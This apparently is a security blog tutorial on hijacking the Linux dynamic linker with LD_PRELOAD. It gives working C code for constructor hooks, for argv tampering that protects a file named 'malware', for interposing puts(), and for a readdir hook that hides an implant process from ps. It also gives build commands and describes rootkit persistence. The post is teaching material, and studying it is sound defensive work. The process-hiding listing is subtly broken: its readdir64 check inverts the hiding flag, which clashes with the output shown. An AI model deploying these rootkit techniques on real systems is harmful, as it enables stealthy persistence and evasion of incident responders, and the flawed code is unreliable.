Abusing env_keep+="LD_PRELOAD" in /etc/sudoers to pop a root shell is a well-known, beginner friendly, way to introduce people to privileges escalation (I even teach this in my privesc 101 lesson at the university), but I personally never really took the time to dig more about the whole dynamic linker hijacking thing. However, Acronis’s recent TRU report got me really interested into knowing more about this vector (absolute banger of a threat intel report by the way).
This post is the compilation and reordering of notes I took while learning how to weaponize the dynamic linker.
What’s a linker?
A linker is a program in the compiler toolchain (ld in Linux/GCC) that combines one or more compiled object files (.o) into a single executable file, library, or shared object.
It performs two primary tasks:
-
symbol resolution, connecting function calls and variable references across different code files to their actual definitions;
-
relocation, assigning effective memory addresses to code and data blocks so the CPU knows where to jump during execution.
Dynamic linking defers the linking step from compile time to program execution time. Instead of embedding the full code of external libraries into the executable (that’s static linking), the compiler leaves placeholder references called dynamic symbols. When the program is run, the operating system’s dynamic linker/loader (ld-linux.so on Linux) loads the required shared libraries (.so files) into memory and links the symbols on the fly so the program can use them.
LD_PRELOAD is an environment variable in Linux (and similar) operating systems that instructs the dynamic linker (ld.so) to load specified shared libraries before any other library, including the standard C library (libc.so).
Because the dynamic linker resolves symbols in a “first match wins” way, functions defined in the preloaded library override functions with the same name in the standard libraries or application code.
Weaponizing LD_PRELOAD
As many other things in the Linux ecosystem, the dynamic linker can be weaponized to gain extra privileges or to have some kind of persistence.
The technique, often used by Linux rootkits and tracked in the MITRE ATT&CK matrix as “Hijack Execution Flow: Dynamic Linker Hijacking” (T1574.006), is described as follows:
Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from various environment variables and files, such as
LD_PRELOADon Linux […]. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.
In this post, we’ll see how an attacker could execute code before or after the execution of a program, and how they could override existing symbols with custom functions. In most of the following examples, we’ll hijack the execution of a simple Hello World! program, compiled as main:
#include <stdio.h>
int main()
{
printf("Hello World!\n");
return 0;
}
Constructors/destructors
Constructors/destructors allow our malicious library to run before or after the program (at load/unload time). Let’s imagine the following piece of C code:
#include <linux/limits.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
void __attribute__((constructor)) load_hook()
{
char proc_name[PATH_MAX];
memset(proc_name, 0, sizeof(proc_name));
if (readlink("/proc/self/exe", proc_name, sizeof(proc_name)-1) == -1)
{
perror("readlink failed");
return;
}
printf("[*] process %s hooked\n", proc_name);
}
This program declares a constructor load_hook(). When loaded as a library, the function will run before anything else. In case of multiple constructors, their execution order can be set using a priority parameter (constructor(P)). Let’s create our .so file:
$ gcc -fPIC -shared inject.c -o inject.so
and load it with our main program:
$ LD_PRELOAD="./inject.so" ./main
[*] process /home/user/src/ldpreload/main hooked
Hello World!
As we can see, our library got executed before main. It works other binaries too:
$ LD_PRELOAD="./inject.so" ls
[*] process /usr/bin/ls hooked
inject.c inject.so main main.c
Using the destructor attribute, we can run our function when the library is being unloaded, typically at the end of the program:
$ diff inject.c inject_after.c
7c7
< void __attribute__((constructor)) load_hook()
---
> void __attribute__((destructor)) load_hook()
$ gcc -fPIC -shared inject_after.c -o inject_after.so
$ LD_PRELOAD="./inject_after.so" ./main
Hello World!
[*] process /home/user/src/ldpreload/main hooked
However, for some executable such as ls, nothing gets printed after the program:
$ LD_PRELOAD="./inject_after.so" ls
inject_after.c inject_after.so inject.c inject.so main main.c
I’ll let you think about why :) (spoiler).
Tamper with program arguments
So we can execute custom code before and after a program execution, that’s cool. But what could we do with that? As you probably noticed, our library is loaded within the same process as the target program, and we have access to the same environment and arguments:
#include <stdio.h>
#include <string.h>
void __attribute__((constructor)) tamper_argv(int argc, char **argv, char **envp)
{
/* we only want to target the 'touch' utility */
if (strcmp(argv[0], "/usr/bin/touch") != 0)
{
return;
}
if (argc > 1 && argv[1] != NULL)
{
argv[1] = "my_evil_file.txt";
}
}
The function tamper_argv() alters the first argument of the program called transparently:
$ LD_PRELOAD="./inject_args.so" touch my_super_file.txt
$ ls my_super_file.txt
ls: cannot access 'my_super_file.txt': No such file or directory
$ ls my_evil_file.txt
my_evil_file.txt
Or a little bit more maliciously:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void __attribute__((constructor)) tamper_argv(int argc, char **argv, char **envp)
{
if (strcmp(argv[0], "/usr/bin/rm") != 0)
{
return;
}
if (argc < 2 || argv[1] == NULL)
{
return;
}
/* skip 'malware' deletion */
if (strcmp(argv[1], "malware") == 0)
{
exit(0);
}
}
Of course, this is not super duper complex to detect and mitigate but it demonstrates the potential power of dynamic linker rootkits. Abusing ld_preload to execute code before the program entrypoint is a technique used by the SIXZUT rootkit1 for example. When a command is ran, the malicious constructor searches for the initial implant binary on disk, and re-execute it if it has been stopped, ensuring persistence on the victim machine.
Function interposition
Function interposition is, at its simplest form, just replacing a function from one of yours. Let’s take our “Hello World!” program written above. Even if we’ re using printf() in the code, GCC decides to call puts() instead:
$ objdump --disassemble=main -M intel ./main
./main: file format elf64-x86-64
[...]
0000000000001139 <main>:
1139: 55 push rbp
113a: 48 89 e5 mov rbp,rsp
113d: 48 8d 05 c0 0e 00 00 lea rax,[rip+0xec0]
1144: 48 89 c7 mov rdi,rax
1147: e8 e4 fe ff ff call 1030 <puts@plt>
114c: b8 00 00 00 00 mov eax,0x0
1151: 5d pop rbp
1152: c3 ret
[...]
$ ./main
Hello World!
In our malicious shared library, we can write the following code:
#include <unistd.h>
#include <string.h>
int puts(const char *s)
{
char* msg = "pwned!\n";
write(1, msg, strlen(msg));
return 0;
}
and inject it in our main program:
$ LD_PRELOAD="./inject.so" ./main
pwned!
As we can see, our version of puts() replaced the original one! This is really cool from a malware point-of-view, as we could potentially hook to functions that could reveal our presence.
Hiding our tracks
Imagine this terrific implant that runs in background:
#include <unistd.h>
#include <stdio.h>
int main()
{
printf("[*] PID: %d\n", getpid());
while(1){}
}
$ gcc implant.c -o implant
$ ./implant
[*] PID: 74570
If it doesn’t try to be hidden, its presence will be revealed with tools such as ps:
$ ps auwx | grep 74570
user 74570 100 0.0 2560 1628 pts/0 R+ 20:53 1:02 ./implant
Could we find a way to tamper ps’s output? Let’s find out!
To list all processes, ps relies on the /proc filesystem. It opens each folder to get processes information, so one of the easiest ways to hide a process from it is to hook readdir/readdir64 so that the /proc/PID directory entry never gets returned.
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <string.h>
#include <limits.h>
#include <unistd.h>
#include <stdio.h>
#ifndef HIDDEN_PID
#define HIDDEN_PID "1337"
#endif
static int hiding = 1;
static struct dirent *(*real_readdir)(DIR *) = NULL;
static struct dirent64 *(*real_readdir64)(DIR *) = NULL;
static int is_target_process()
{
char path[PATH_MAX];
ssize_t n = readlink("/proc/self/exe", path, sizeof path - 1);
if (n < 0)
{
return 0;
}
path[n] = '\0';
const char *base = strrchr(path, '/');
base = base ? base + 1 : path;
return strcmp(base, "ps") == 0;
}
void __attribute__((constructor)) init_hiding()
{
hiding = is_target_process();
}
void __attribute__((constructor)) check_proc_name()
{
char proc_name[PATH_MAX];
memset(proc_name, 0, sizeof(proc_name));
ssize_t n = readlink("/proc/self/exe", proc_name, sizeof(proc_name)-1);
if (n == -1)
{
perror("readlink failed");
return;
}
proc_name[n] = '\0'; /* needs to be null-terminated for strcmp */
if (strcmp(proc_name, "/usr/bin/ps") != 0)
{
hiding = 0; /* it's not ps, so don't hook */
}
}
struct dirent *readdir(DIR *dirp)
{
if (real_readdir == NULL)
{
real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
}
struct dirent *entry;
while ((entry = real_readdir(dirp)) != NULL)
{
if (hiding && strcmp(entry->d_name, HIDDEN_PID) == 0)
{
continue; /* skip if it's the PID we wanna hide */
}
break;
}
return entry;
}
struct dirent64 *readdir64(DIR *dirp)
{
if (real_readdir64 == NULL)
{
real_readdir64 = (struct dirent64 *(*)(DIR *))dlsym(RTLD_NEXT, "readdir64");
}
struct dirent64 *entry;
while ((entry = real_readdir64(dirp)) != NULL)
{
if (!hiding && strcmp(entry->d_name, HIDDEN_PID) == 0)
{
continue;
}
break;
}
return entry;
}
This code does the following:
-
First, we do some imports and we declare
HIDDEN_PID. Ideally, this should be fetched dynamically based on the process name in a constructor, but for the sake of the demonstration I kept it short and I’ll override it at compile time. -
Then, we check if the process being executed is
ps. If yes,hidingis set to 1. Otherwise, not hiding will take place. -
Next, we create two functions pointers that hold the addresses of the “real” libc functions so we can use them later on to really perform the operation.
-
For both functions we wanna hook, we first populate the functions pointers, and then we run them with an additional check that verifies if the directory name contains our hidden process value. If it contains it and we enabled the “hidin” mechanism, then the
HIDDEN_PIDprocess will not be returned.
We build the .so file and 🪄 abracadabra:
$ ./implant &
[1] 101841
[*] PID: 101841
$ gcc -fPIC -shared hidden_proc.c -o hidden_proc.so -DHIDDEN_PID='"101841"'
$ LD_PRELOAD="./hidden_proc.so" ps auwx | grep implant
user 101995 0.0 0.0 6604 2404 pts/0 S+ 21:41 0:00 grep implant
No sign of the implant process in ps output! For inexperiences incident responders at least: any modern anti-rootkit software (unhide, …) will find that there’s a mismatch between ps output and the number of directories in /proc. However, user-land anti-rootkit softwares could kinda easily be deceived, and I may write a post about it. Otherwise, there’s a pretty neat paper about the topic: “User-space library rootkits revisited: Are user-space detection mechanisms futile?”.
Final words
To ease the demonstration, I heavily relied on the LD_PRELOAD environment variable to load my malicious librairies. In the real world, an attacker would probably attempt to referebce them in the various shared dependency files (/etc/ld.so.cache, …).
But it remains a really cool technique nonetheless. I also still have plenty of other things to explore, and soo many things to try to hijack with symbol interposition: PAM functions, logging (syslog(3)), …
-
Check the report linked at the top of the article for more details. ↩︎